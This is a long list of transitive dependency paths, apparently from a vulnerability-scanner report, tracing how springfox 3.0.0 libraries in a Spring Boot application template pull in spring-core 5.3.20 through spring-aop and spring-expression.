  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
